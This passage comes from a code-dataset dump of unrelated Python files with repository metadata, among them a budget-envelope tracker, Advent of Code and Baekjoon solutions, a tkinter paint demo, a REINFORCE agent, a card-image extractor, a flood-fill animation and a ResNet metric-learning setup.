For example it can be wallet, card, safe and etc,\t\n# Envelop(3) - the main idea of app is separate money by virtual envelopes and through this get control by money,\n# Spent or earned(4) - '+' or '-' count for envelop\n# Amount(5) - amount of money which you spent or got on your account\n# Envelop balance(6) - amount of money in the envelope after transaction \n\n#----------------------- reading and storing in json --------------------------------------\ndef read_repo_from_json():\n with open(\"repo.json\", 'r') as f:\n repo = json.load(f)\n return repo\n\ndef store_repo_in_json():\n with open(\"repo.json\", 'w') as f:\n json.dump(repo, f)\n\ndef read_places_from_json():\n with open(\"places.json\", 'r') as f:\n places = json.load(f)\n return places\n\ndef store_places_in_json():\n with open(\"places.json\", 'w') as f:\n json.dump(places, f)\n\ndef read_envelopes_from_json():\n with open(\"envelopes.json\", 'r') as f:\n envelopes = json.load(f)\n return envelopes\n\ndef store_envelopes_in_json():\n with open(\"envelopes.json\", 'w') as f:\n json.dump(envelopes, f)\n\nrepo = read_repo_from_json()\nplaces = read_places_from_json()\nenvelopes = read_envelopes_from_json()\n\n#----------------------- places ------------------------------------------------------------\ndef get_place_balance(name, last_row=None):\n if last_row==0:\n res = f\"No balance for {name}\"\n return res \n if not last_row:\n last_row = str(len(repo)) \n if repo[str(last_row)][2] == name:\n return repo[str(last_row)][6]\n else:\n last_row = int(last_row)-1\n return get_place_balance(name, last_row)\n\ndef add_place_name(name):\n places[len(places)+1]=name\n return places\n\ndef change_place_name(place, k, last_row=None):\n old_place = places[k]\n if last_row==0:\n places[k]=place\n return \n if not last_row:\n last_row = str(len(repo))\n if repo[str(last_row)][2] == old_place:\n repo[str(last_row)][2] = place\n return change_place_name (place, k, int(last_row)-1)\n else:\n return change_place_name (place, k, int(last_row)-1)\n\ndef delete_place_name(k):\n places.pop(k)\n return (places)\n\ndef count_expenses_by_place(name,last_row=None):\n if last_row==0:\n return 0\n if not last_row:\n last_row = str(len(repo))\n if repo[str(last_row)][2]==name and repo[str(last_row)][4]=='-':\n expenses = repo[str(last_row)][5]\n return expenses+count_expenses_by_place(name, int(last_row)-1)\n else:\n return count_expenses_by_place(name, int(last_row)-1) \n\ndef count_income_by_place(name,last_row=None):\n if last_row==0:\n return 0\n if not last_row:\n last_row = str(len(repo))\n if repo[str(last_row)][2]==name and repo[str(last_row)][4]=='+':\n income = repo[str(last_row)][5]\n return income+count_income_by_place(name, int(last_row)-1)\n else:\n return count_income_by_place(name, int(last_row)-1)\n\ndef show_places():\n return places\n\ndef get_places_len():\n res = len(places)\n return res \n\n#----------------------- envelopes ------------------------------------------------------------\ndef count_expenses_by_envelope(name,last_row=None):\n if last_row==0:\n return 0\n if not last_row:\n last_row = str(len(repo))\n if repo[str(last_row)][3]==name and repo[str(last_row)][4]=='-':\n expenses = repo[str(last_row)][5]\n return expenses+count_expenses_by_envelope(name, int(last_row)-1)\n else:\n return count_expenses_by_envelope(name, int(last_row)-1) \n\ndef add_envelopes_limit(k, limit):\n envelopes[k][1]=limit\n return envelopes\n\ndef add_envelope_name(name):\n envelopes[len(envelopes)+1]=[name,'None']\n return envelopes\n\ndef 
change_envelope_name(envelope, k, last_row=None):\n old_envelope = envelopes[k][0]\n if last_row==0:\n envelopes[k][0]=envelope\n return \n if not last_row:\n last_row = str(len(repo))\n if repo[str(last_row)][3] == old_envelope:\n repo[str(last_row)][3] = envelope\n return change_envelope_name (envelope, k, int(last_row)-1)\n else:\n return change_envelope_name (envelope, k, int(last_row)-1)\n\ndef delete_envelope_name(k):\n envelopes.pop(k)\n return (envelopes)\n\ndef count_income_by_envelope(name,last_row=None):\n if last_row==0:\n return 0\n if not last_row:\n last_row = str(len(repo))\n if repo[str(last_row)][3]==name and repo[str(last_row)][4]=='+':\n income = repo[str(last_row)][5]\n return income+count_income_by_envelope(name, int(last_row)-1)\n else:\n return count_income_by_envelope(name, int(last_row)-1)\n\ndef show_envelopes():\n return envelopes\n\ndef get_envelopes_len():\n res = len(envelopes)\n return res \n\n\n#----------------------- rows ------------------------------------------------------------\ndef add_row(date, hour, place,envelop, spent_or_earned, amount, balance):\n new_row = [date, hour, place, envelop, spent_or_earned, amount, balance]\n repo[str(len(repo)+1)] = new_row\n res = [str(len(repo))]\n res.append(new_row)\n return res\n\ndef get_row(n):\n res = repo[n]\n return res\n\ndef get_repo_len():\n res = len(repo)\n return res ","repo_name":"MikitaTsiarentsyeu/Md-PT1-50-22","sub_path":"Tasks/Bartosh/Task6/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15121645175","text":"\nfrom collections import defaultdict, deque\nimport heapq\nimport re\n\nfrom help import get_input\n\n'''\nPart1\n-----\n1762: too low\n1857: too low, same as other answer\n1915: tool low, same as other answer\n'''\n\nTEST1 = '''Valve AA has flow rate=0; tunnels lead to valves DD, II, BB\nValve BB has flow rate=13; tunnels lead to valves CC, AA\nValve CC has flow rate=2; tunnels lead to valves DD, BB\nValve DD has flow rate=20; tunnels lead to valves CC, AA, EE\nValve EE has flow rate=3; tunnels lead to valves FF, DD\nValve FF has flow rate=0; tunnels lead to valves EE, GG\nValve GG has flow rate=0; tunnels lead to valves FF, HH\nValve HH has flow rate=22; tunnel leads to valve GG\nValve II has flow rate=0; tunnels lead to valves AA, JJ\nValve JJ has flow rate=21; tunnel leads to valve II'''\n\nregex = re.compile('Valve (\\w+) has flow rate=(\\d+); tunnels? leads? to valves? 
(.*)')\n\nSTART = 'AA'\nTOTAL_TIME_PART_1 = 30\nTOTAL_TIME_PART_2 = 26\n\ndef parse(s):\n M = {}\n P = {}\n for line in s.split('\\n'):\n m = regex.match(line)\n assert m is not None\n valve = m[1]\n rate = int(m[2])\n other_valves = m[3].split(', ')\n M[valve] = other_valves\n P[valve] = rate\n return M, P\n\n\ndef new_map(M, P):\n M1 = defaultdict(list)\n V = [v for v, p in P.items() if p > 0]\n V = [START] + V\n for vstart in V:\n q = [(0, vstart)]\n seen = set()\n\n # print(vstart, q, seen)\n\n while q:\n t, v = heapq.heappop(q)\n\n if v in seen:\n continue\n seen.add(v)\n\n\n if P[v] > 0 and v != vstart:\n M1[vstart].append((v, t))\n\n for nv in M[v]:\n q.append((t + 1, nv))\n\n return M1\n\n\ndef neighbour_state(state, M1, P):\n '''\n Excluded is a previous valve that we don't want to consider again as a neighbour.\n '''\n pressure, valve, minute, opened = state\n if P[valve] > 0 and valve not in opened:\n new_openened = opened.copy()\n new_openened = new_openened | frozenset([valve])\n extra_pressure = (TOTAL_TIME_PART_1 - minute - 1) * P[valve]\n yield pressure + extra_pressure, valve, minute + 1, new_openened\n for neighbour, dt in M1[valve]:\n yield pressure, neighbour, minute + dt, opened\n\n\ndef neighbour_state_2(state, M1, P):\n p, v1, v2, t, o = state\n\n s1 = p, v1, t, o\n for n1 in neighbour_state(s1, M1, P):\n p1a, n1a, t1a, o1a = n1\n\n o2 = o | o1a\n s2 = p1a, v2, t, o2\n for n2 in neighbour_state(s2, M1, P):\n p2a, n2a, t2a, o2a = n2\n\n t_new = max(t1a, t2a)\n new_state = p2a, n1a, n2a, t_new, o2a\n\n yield new_state\n\n\ndef part1(M, P):\n '''\n State: total_pressure, current valve, minute, opened valves\n '''\n start_state = 0, START, 0, frozenset()\n q = [start_state]\n seen = set()\n pressure = 0\n\n while q:\n state = heapq.heappop(q)\n if state[0] > pressure:\n pressure = state[0]\n # print('New max', pressure)\n\n test = state[1], state[2], state[3]\n if test in seen:\n continue\n seen.add(test)\n\n for n_state in neighbour_state(state, M, P):\n if n_state[2] <= TOTAL_TIME_PART_1:\n heapq.heappush(q, n_state)\n\n return pressure\n\n\ndef part2(M, P):\n '''\n State: total_pressure, my valve, elephant valve, minute, opened valves\n '''\n start_state = 0, START, START, 0, frozenset()\n q = [start_state]\n seen = set()\n pressure = 0\n\n i = 0\n\n while q:\n state = heapq.heappop(q)\n\n i += 1\n if i % 100_000 == 0:\n print(state, len(q))\n\n if state[0] > pressure:\n pressure = state[0]\n\n test = state[1], state[2], state[3], state[4]\n if test in seen:\n continue\n seen.add(test)\n\n for n_state in neighbour_state_2(state, M, P):\n if n_state[3] <= TOTAL_TIME_PART_2:\n heapq.heappush(q, n_state)\n\n return pressure\n\n\ndef main():\n # s = get_input('16')\n s = TEST1.strip()\n M, P = parse(s)\n M1 = new_map(M, P)\n\n p1 = part1(M1, P)\n # p2 = part2(M1, P)\n\n print('Part 1:', p1)\n # print('Part 2:', p2)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PreludeAndFugue/AdventOfCode","sub_path":"2022/python/day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23446861546","text":"# 최대 M원\nimport sys\nfrom heapq import heappush, heappop\n\ninput = lambda : sys.stdin.readline().rstrip()\nINF = float(\"inf\")\n\ntest_size = int(input())\nfor test in range(test_size) :\n N, cost, M = map(int, input().split()) # 공항의 수, 총 지원 비용, 티켓 정보의 수\n dp = [[INF] * N for _ in range(cost+1)] # 열 = 노드 / 행 = 비용\n graph = [[] for _ in 
range(N)]\n\n for i in range(M) :\n U, V, C, D = map(int, input().split()) # 도착, 출발, 비용, 시간\n graph[U-1].append((V-1, C, D)) # 도착점, 비용, 시간 저장\n heap = [(0, 0, 0)] # 거리, 비용, 노드\n while heap :\n now_dist, now_cost, now_node = heappop(heap)\n if now_dist > dp[now_cost][now_node] :\n continue\n for to_node, to_cost, to_dist in graph[now_node] :\n tmp_dist = now_dist + to_dist\n tmp_cost = now_cost + to_cost\n if tmp_cost <= cost and tmp_dist < dp[tmp_cost][to_node]:\n # 더 높은 cost를 투자할 때의 가중치도 초기화 해주기\n for c in range(tmp_cost, cost+1) :\n if dp[c][to_node] > tmp_dist :\n dp[c][to_node] = tmp_dist\n else:\n break\n heappush(heap, (tmp_dist, tmp_cost, to_node))\n\n print(dp[cost][N-1] if dp[cost][N-1] != INF else \"Poor KCM\")\n\n","repo_name":"JoungMinJu/PyCodingTest","sub_path":"Reis/dijkstra/first/BOJ_10217.py","file_name":"BOJ_10217.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7848584507","text":"from tkinter import *\n\n\nclass PaintBox(Frame):\n\n\n def __init__(self):\n Frame.__init__(self)\n self.pack(expand=YES, fill=BOTH)\n self.master.title(\"Paint with Python\")\n self.master.geometry(\"500x500\")\n\n self.message = Label(self, text=\"Drag the mouse to draw\")\n self.message.pack(side=BOTTOM)\n\n self.myCanvas = Canvas(self)\n self.myCanvas.pack(expand=YES, fill=BOTH)\n\n self.myCanvas.bind(\"\", self.paint)\n\n def paint(self, event):\n x1,y1 = (event.x -2 ), (event.y -2 )\n x2,y2 = (event.x +2 ), (event.y +2 )\n self.myCanvas.create_oval(x1,y1,x2,y2,fill=\"Blue\", outline=\"red\")\n\ndef main():\n PaintBox().mainloop()\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"paladino3/AulasPythnoPOO","sub_path":"DevMediaPythonCompleto65Horas/Aula43.InterFaceGraficaCanvas02.py","file_name":"Aula43.InterFaceGraficaCanvas02.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42875136379","text":"# SUJET 34\n\n# Exo 1 :\ndef moyenne(tab):\n sum = 0\n for element in tab :\n sum += element\n if len(tab) != 0 :\n return sum/len(tab)\n else :\n # Proposer une façon de traiter le cas où le tableau passé en paramètre est vide.\n return 'Votre tableau est vide !'\n\n# Appels de vérification :\nprint(moyenne([5,3,8]))\nprint(moyenne([1,2,3,4,5,6,7,8,9,10]))\nprint(moyenne([]))\n\n# Exo 2 :\ndef tri(tab):\n # i est le premier indice de la zone non triée,\n # j est le dernier indice de cette zone non triée.\n # Au début, la zone non triée est le tableau complet.\n i = 0\n j = len(tab) - 1\n while i != j:\n if tab[i]== 0:\n i = i + 1\n else:\n valeur = tab[j]\n tab[j] = tab[i]\n tab[i] = valeur\n j = j - 1\n return tab\n\n# Appels de vérification :\nprint(tri([0,1,0,1,0,1,0,1,0]))","repo_name":"4strium/Exos-BAC-NSI-2023","sub_path":"SUJET_34/SUJET_34_CORRECTION.py","file_name":"SUJET_34_CORRECTION.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25438817312","text":"import sys, os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport gym\nfrom torch.distributions import Categorical\nfrom Network.MLP import MLP\nfrom Memory.Memory import Buffer\nfrom Utils.utils import *\n\n\nclass REINFORCE(nn.Module):\n\n def __init__(self, s_dim, a_dim, device):\n super(REINFORCE, self).__init__()\n\n self.s_dim = s_dim\n self.a_dim = a_dim\n self.policy = MLP(s_dim, 
a_dim, num_neurons=[256]).to(device)\n self.optimizer = torch.optim.Adam(self.policy.parameters(), lr=3e-4)\n self.softmax = nn.Softmax(dim=-1)\n self.logmax = nn.LogSoftmax(dim=-1)\n self.memory = Buffer()\n self.gamma = 0.99\n self.device = device\n\n\n def get_action(self, state):\n\n state = ToTensor(state).to(self.device)\n prob = self.softmax(self.policy(state))\n action = Categorical(prob).sample()\n\n return action.view(-1).detach().cpu().numpy()\n\n def get_sample(self, s, a, r, ns, done):\n\n s = ToTensor(s)\n a = ToTensor(a, False)\n r = ToTensor(r)\n ns = ToTensor(ns)\n done = ToTensor(done)\n\n self.memory.push(s, a, r, ns, done)\n\n def update(self):\n \n states, actions, rewards, _, _ = self.memory.get_sample()\n\n G = 0.0\n for s, a, r in zip(states[::-1], actions[::-1], rewards[::-1]):\n s, a, r = s.to(self.device), a.to(self.device), r.to(self.device)\n G = r + self.gamma*G\n\n log_prob = self.logmax(self.policy(s)).view(-1)[a.item()]\n Loss = -log_prob*G\n\n self.optimizer.zero_grad()\n Loss.backward()\n self.optimizer.step()\n\n self.memory.reset()\n\n def episodic_update(self):\n\n states, actions, rewards, _, _ = self.memory.get_sample()\n\n G = 0.0\n Reward2Go = []\n for r in rewards[::-1]:\n G = r + self.gamma*G\n Reward2Go.insert(0,G)\n\n Reward2Go = torch.tensor(Reward2Go).float().to(self.device)\n Reward2Go = (Reward2Go - Reward2Go.mean()) / Reward2Go.std()\n states = torch.cat(states, dim=0).to(self.device)\n actions = torch.cat(actions, dim=0).to(self.device)\n\n log_prob = self.logmax(self.policy(states))\n log_prob = log_prob.gather(1, actions).view(-1)\n Loss = -(log_prob * Reward2Go).mean()\n\n self.optimizer.zero_grad()\n Loss.backward()\n self.optimizer.step()\n \n self.memory.reset()\n\n def run_episode(self, env, num_episode):\n\n reward_sum = []\n\n for ep in range(num_episode):\n cum_r = 0\n s = env.reset()[0]\n\n while True:\n a = self.get_action(s)\n ns, r, done, trunc, _ = env.step(a.item())\n new_done = False if (done==False and trunc==False) else True\n\n self.get_sample(s, a, r/100, ns, new_done)\n s = ns\n cum_r += r\n\n if new_done:\n self.episodic_update()\n reward_sum.append(cum_r)\n break\n\n print('ep : {} | reward : {}'.format(ep, cum_r))\n\n if ep % 10 == 0 and ep != 0:\n print('ep : {} | reward_avg : {}'.format(ep, np.mean(reward_sum)))\n reward_sum = []\n\n\n\ndef main():\n\n\n env = gym.make('CartPole-v1')\n s_dim = env.observation_space.shape[0]\n a_dim = env.action_space.n\n\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n print(device)\n\n agent = REINFORCE(s_dim, a_dim, device)\n\n agent.run_episode(env, 1000)\n \n\nif __name__ == \"__main__\":\n main()","repo_name":"yujunyoung1107/Deep-RL","sub_path":"REINFORCE.py","file_name":"REINFORCE.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73809997587","text":"import numpy as np\nfrom card_constants import *\nfrom polynomial_fitters import *\nfrom PIL import Image, ImageFilter, ImageDraw, ImageTransform\n\ndef extract_card(image, draw=False):\n img_array = np.array(image, dtype=np.uint8)\n # Find small box around card\n (left, right) = process_horisontal(img_array, np.array(minor_border_color), 100)\n (top, bottom) = process_vertical(img_array, np.array(minor_border_color), 100)\n\n # Define padding around box\n d_left = 10\n d_top = 10\n d_right = 13\n d_bottom = 15\n\n left_x = [l[0] for l in left]\n rigt_x = [l[0] for l in right]\n top_y = [l[1] for 
l in top]\n bottom_y = [l[1] for l in bottom] \n\n box = [min(left_x)-d_left, \n min(top_y)-d_top,\n max(rigt_x)+d_right,\n max(bottom_y)+d_bottom]\n \n image_box = image.crop(box)\n\n # Use edge detection on boxed card to find edges\n imgw = image_box.convert(\"L\")\n imgw = imgw.filter(ImageFilter.FIND_EDGES)\n\n # Remove 1 px as this is detected as an edge\n box_1px = [1,1,imgw.size[0]-1, imgw.size[1]-1]\n \n image_box = image_box.crop(box_1px)\n imgw = imgw.crop(box_1px)\n\n img_array = np.array(imgw, dtype=np.uint8) \n \n (left, right) = process_horisontal(img_array, 255, 100)\n (top, bottom) = process_vertical(img_array, 255, 100)\n\n # Edge detection seem to detect 1px before edge on top and left. Shift to correct\n for i in range(len(left)):\n left[i][0] = left[i][0] + 1\n\n for i in range(len(top)):\n top[i][1] = top[i][1] + 1\n\n if draw:\n img_test = imgw.convert('RGB')\n\n img1 = ImageDraw.Draw(img_test)\n\n def draw_points(points):\n w = 1\n for p in points:\n img1.ellipse((round(p[0])-w, round(p[1])-w,round(p[0])+w,round(p[1])+w), fill='green')\n\n draw_points(left)\n draw_points(right)\n draw_points(top)\n draw_points(bottom)\n\n # Find polynomial that fits the points\n # For left and right we need to swap the points to get a well behaved function\n c_left = fit_polynomial_outliers_iterative(swap_points(left))\n c_right = fit_polynomial_outliers_iterative(swap_points(right))\n c_top = fit_polynomial_outliers_iterative(top)\n c_bottom = fit_polynomial_outliers_iterative(bottom)\n\n p_left = np.poly1d(c_left)\n p_right = np.poly1d(c_right)\n p_top = np.poly1d(c_top)\n p_bottom = np.poly1d(c_bottom)\n\n # Find two points for each line\n xp = [0, imgw.size[0]]\n yp = [0, imgw.size[1]]\n\n top = [np.array([x,p_top(x)]) for x in xp]\n bottom = [np.array([x,p_bottom(x)]) for x in xp]\n\n left = [np.array([p_left(y), y]) for y in yp]\n right = [np.array([p_right(y),y]) for y in yp]\n\n if draw:\n img1.line([left[0][0], left[0][1],left[1][0], left[1][1]], fill=\"red\", width=0)\n img1.line([right[0][0], right[0][1],right[1][0], right[1][1]], fill=\"red\", width=0)\n img1.line([top[0][0], top[0][1],top[1][0], top[1][1]], fill=\"red\", width=0)\n img1.line([bottom[0][0], bottom[0][1],bottom[1][0], bottom[1][1]], fill=\"red\", width=0)\n return img_test\n\n # Use points to find corners of the card\n top_left = find_cross(left[0], left[1], top[0],top[1])\n top_right = find_cross(right[0], right[1], top[1],top[0])\n bottom_left = find_cross(left[1], left[0], bottom[0],bottom[1])\n bottom_right = find_cross(right[1], right[0], bottom[1],bottom[0])\n\n # Rotate and crop card using corners\n\n # Use this https://stackoverflow.com/questions/71724403/crop-an-image-in-pil-using-the-4-points-of-a-rotated-rectangle\n # Define 8-tuple with x,y coordinates of top-left, bottom-left, bottom-right and top-right corners and apply\n transform=[*top_left,*bottom_left,*bottom_right, *top_right]\n size = (card_w,card_h)\n\n result = image_box.transform(size, ImageTransform.QuadTransform(transform), resample=Image.Resampling.BICUBIC)\n \n return result\n\ndef find_cross(p1,p2,q1,q2):\n # p(t) = a*t + b\n a = p1-p2\n b = p2\n\n # q(t) = c*t + d\n c = q1-q2\n d = q2\n\n # Solve p(t1) = q(t2), i.e. 
At = bm\n A = np.array([a, -c]).T\n bm = d-b\n\n t = np.linalg.solve(A,bm)\n\n # Calculate point using p(t1)\n x = a*t[0] + b\n\n return x\n\ndef swap_points(p):\n res = []\n for i in range(len(p)):\n res.append([p[i][1], p[i][0]])\n return res\n\ndef process_horisontal(img_array, target, threshold):\n h = img_array.shape[0]\n\n border = (h - card_h)\n safety = 5\n\n # Top\n start = border + card_corner_size + safety\n end = card_top_part_h - safety\n horisontal_lines = [i for i in range(start, end, 1)]\n\n # Bottom\n start = card_h + border - card_bottom_part_h + safety\n end = card_h - border - card_corner_size - safety\n for i in range(start, end, 1):\n horisontal_lines.append(i)\n\n return process_horisontal_lines(img_array, horisontal_lines, target, threshold)\n\ndef process_horisontal_lines(img_array, lines, target, threshold):\n points_left = []\n points_right = []\n for line in lines:\n line_slice = img_array[line, :]\n (px1,px2) = find_line_in_slice(line_slice, target, threshold)\n points_left.append(np.array([px1, line]))\n points_right.append(np.array([px2, line]))\n\n return (points_left, points_right)\n\ndef process_vertical(img_array,target, threshold):\n w = img_array.shape[1]\n \n border = (w - card_w)\n safety = 5\n\n start = border + card_corner_size + safety\n end = w - start\n vertical_lines = [i for i in range(start,end,1)]\n\n points_top = []\n points_bottom = []\n for line in vertical_lines:\n line_slice = img_array[:, line]\n (px1,px2) = find_line_in_slice(line_slice, target, threshold)\n points_top.append(np.array([line, px1 ]))\n points_bottom.append(np.array([line, px2]))\n\n return (points_top, points_bottom)\n\ndef find_line_in_slice(img_slice, target_color, threshold=100):\n\n idx = []\n for i in range(len(img_slice)):\n color = img_slice[i]\n diff = target_color - color\n d = np.linalg.norm(diff)\n if(d < threshold):\n idx.append(i)\n\n first = idx[0]\n last = idx[-1]\n\n return (first, last)\n\n\nif __name__ == '__main__':\n path = 'img_src\\\\card_split\\\\FR003.png'\n img = extract_card(Image.open(path), draw=False)\n\n img.save('test.png')","repo_name":"hauk88/CardExtractor","sub_path":"extract_card.py","file_name":"extract_card.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38656613883","text":"t = int(input())\nfor tc in range(1, t+1):\n target = list(input())\n val = ['0'] * len(target)\n ans = 0\n for i in range(len(target)):\n if val[i] != target[i]:\n ans += 1\n for j in range(i, len(target)):\n val[j] = target[i]\n\n\n print('#{} {}'.format(tc, ans))\n\n","repo_name":"toki0411/Algorithm","sub_path":"SWEA/D3/1289. 
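The memory-restore solution above rewrites the whole suffix whenever the current value differs from the target, which is O(n²) because of the inner loop. The answer it produces is simply the number of symbol changes seen while scanning, so an equivalent O(n) sketch (the input string here is hypothetical) is:

```python
def min_flips(target: str) -> int:
    ops, state = 0, '0'                  # memory starts as all zeros
    for ch in target:
        if ch != state:                  # each change of symbol costs one rewrite
            ops += 1
            state = ch
    return ops

print(min_flips('0011100'))              # -> 2, same as the suffix-rewriting version
```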
원재의 메모리 복구하기/원재의 메모리 복구하기.py","file_name":"원재의 메모리 복구하기.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2134898075","text":"#!/usr/bin/env python3\nimport time\nimport os\n\ndef get_array_from_string(string):\n \"\"\"Turns a string into a list of lists (\"an array\"), and returns\n a tuple consisting of the array, the height and the width.\n \"\"\"\n array = []\n for row in string.split(\"\\n\"):\n if row:\n array.append(list(row))\n height = len(array)\n width = len(array[0])\n return array, height, width\n\ndef print_array(array):\n \"\"\"Takes a list of lists `array` and prints it to the screen, row for row,\n by joining each row with \"\".join\n \"\"\"\n for row in array:\n print(\"\".join(row))\n \n \ndef print_array_and_clear_and_wait(array):\n print_array(array)\n time.sleep(0.25)\n \n # Windows command line uses cls instead of clear to clear the terminal\n if os.name == \"nt\":\n os.system(\"cls\")\n else:\n os.system(\"clear\")\n\nbean = \"\"\"\n xxxx \n x x\nx xx \nx x \nx x \n xxxx \n\"\"\"\n\nWALL = \"x\"\nEMPTY = \" \"\narray, HEIGHT, WIDTH = get_array_from_string(bean)\n\ndef get_valid_neighbors(y, x):\n valid_neighbors = []\n for neighbor_y, neighbor_x in [\n (y-1, x),\n (y+1, x),\n (y, x+1),\n (y, x-1),\n ]:\n if neighbor_y >= 0 and neighbor_y < HEIGHT and \\\n neighbor_x >= 0 and neighbor_x < WIDTH:\n valid_neighbors.append((neighbor_y, neighbor_x))\n return valid_neighbors\n \ndef fill_array_at_point(array, y, x, fillchar):\n if array[y][x] == EMPTY:\n array[y][x] = fillchar\n print_array_and_clear_and_wait(array)\n for neighbor_y, neighbor_x in get_valid_neighbors(y, x):\n fill_array_at_point(array, neighbor_y, neighbor_x, fillchar)\n\ndef main():\n fill_array_at_point(array, 1, 2, 'o')\n print_array(array)\n\nmain()\n","repo_name":"Ran4/dd1331-public","sub_path":"ex04/filler_with_animation.py","file_name":"filler_with_animation.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16365471580","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.models as models\n\nfrom torch.optim import lr_scheduler\nfrom pytorch_metric_learning import distances, losses, miners, reducers, testers\n\nfrom src.configs import DEVICE\nfrom src.models.model_types import ModelTypes\nfrom src.models.multilabel_classifier import MultilabelClassifier\nfrom src.losses.custom_constractive_loss import CustomContrastiveLoss\n\n\nclass ResNetInitializer:\n def __init__(self, model_type, num_superclasses, num_classes, embedding_size=None):\n # Load the pretrained model\n backbone_model = models.resnet18(pretrained=True)\n criterion = None\n model = None\n model_name = None\n\n num_ftrs = backbone_model.fc.in_features\n if model_type == ModelTypes.PLAIN_BACKBONE:\n model_name = 'plain_resnet18'\n # Here the size of each output sample is set to num_superclasses.\n backbone_model.fc = nn.Linear(num_ftrs, num_superclasses)\n model = backbone_model\n elif model_type == ModelTypes.TUNED_WITH_CROSS_ENTROPY:\n model_name = 'resnet18_with_cross_entropy_loss'\n criterion = nn.CrossEntropyLoss()\n model = MultilabelClassifier(backbone_model, num_ftrs, num_superclasses, num_classes)\n elif model_type == ModelTypes.TUNED_WITH_ARCFACE:\n model_name = 'resnet18_with_arcface_loss'\n model = MultilabelClassifier(backbone_model, num_ftrs, embedding_size, embedding_size)\n 
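The flood-fill entry above recurses once per filled cell, which can hit Python's default recursion limit (roughly 1000 frames) on larger grids. A stack-based sketch of the same fill, using a hypothetical 3x3 grid; the animation and printing side effects are omitted:

```python
def fill_iterative(array, y, x, fillchar, empty=" "):
    stack = [(y, x)]
    while stack:
        cy, cx = stack.pop()
        if 0 <= cy < len(array) and 0 <= cx < len(array[0]) and array[cy][cx] == empty:
            array[cy][cx] = fillchar
            # push the four direct neighbours; bounds are checked on pop
            stack.extend([(cy - 1, cx), (cy + 1, cx), (cy, cx + 1), (cy, cx - 1)])

grid = [list("   "), list(" x "), list("   ")]
fill_iterative(grid, 0, 0, "o")
print(["".join(row) for row in grid])    # -> ['ooo', 'oxo', 'ooo']
```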
# We need a separate optimizer for ArcFace Loss!!!\n # Loss for classes\n self.class_criterion = losses.ArcFaceLoss(num_classes, embedding_size).to(DEVICE)\n self.class_loss_optimizer = torch.optim.SGD(self.class_criterion.parameters(), lr=0.01)\n # Loss for superclasses\n self.superclass_criterion = losses.ArcFaceLoss(num_superclasses, embedding_size).to(DEVICE)\n self.superclass_loss_optimizer = torch.optim.SGD(self.superclass_criterion.parameters(), lr=0.01)\n elif model_type == ModelTypes.TUNED_SIAMESE_WITH_CUSTOM_CONTRASTIVE:\n model_name = 'resnet18_siamese_with_custom_contrastive_loss'\n criterion = CustomContrastiveLoss()\n model = MultilabelClassifier(backbone_model, num_ftrs, embedding_size, embedding_size)\n elif model_type == ModelTypes.TUNED_SIAMESE_WITH_CONTRASTIVE:\n model_name = 'resnet18_siamese_with_contrastive_loss'\n criterion = losses.ContrastiveLoss().to(DEVICE)\n model = MultilabelClassifier(backbone_model, num_ftrs, embedding_size, embedding_size)\n elif model_type == ModelTypes.TUNED_WITH_TRIPLET:\n model_name = 'resnet18_with_triplet_loss'\n # Use primitives from pytorch-metric-learning library\n distance = distances.CosineSimilarity()\n reducer = reducers.ThresholdReducer(low=0)\n criterion = losses.TripletMarginLoss(margin=0.5, distance=distance, reducer=reducer).to(DEVICE)\n self.mining_func = miners.TripletMarginMiner(\n margin=0.5, distance=distance, type_of_triplets=\"semihard\"\n )\n model = MultilabelClassifier(backbone_model, num_ftrs, embedding_size, embedding_size)\n\n self.model = model.to(DEVICE)\n self.criterion = criterion\n self.model_name = model_name\n\n # Observe that all parameters are being optimized\n self.optimizer = optim.SGD(self.model.parameters(), lr=0.001, momentum=0.9)\n\n # Decay LR by a factor of 0.1 every 7 epochs\n self.scheduler = lr_scheduler.StepLR(self.optimizer, step_size=7, gamma=0.1)\n\n def get_model_name(self):\n return self.model_name\n","repo_name":"denysgerasymuk799/UCU_CV_Metric_Learning_HW","sub_path":"src/models/resenet_initializer.py","file_name":"resenet_initializer.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33131552942","text":"from django.contrib.auth.decorators import login_required\nfrom api.models import ProgramModel, SubplanModel\nfrom django.shortcuts import render\n\nfrom django_weasyprint import WeasyTemplateResponse\nfrom django.forms.models import model_to_dict\n\nfrom ui.views.staff.view import pretty_print_reqs, pretty_print_rules\n\n\n# check if asking for a published id, if not then we need to check if user is authenticated\ndef check_published(request):\n id_to_view = request.GET.get('id', None)\n\n published = ProgramModel.objects.filter(id=int(id_to_view), publish=True)\n if published:\n return view_program_pdf(request)\n else:\n return check_authentication(request)\n\n\n# forces/check if user is authenticated\n@login_required()\ndef check_authentication(request):\n return view_program_pdf(request)\n\n\ndef view_program_pdf(request):\n \"\"\" Renders a program to a PDF. 
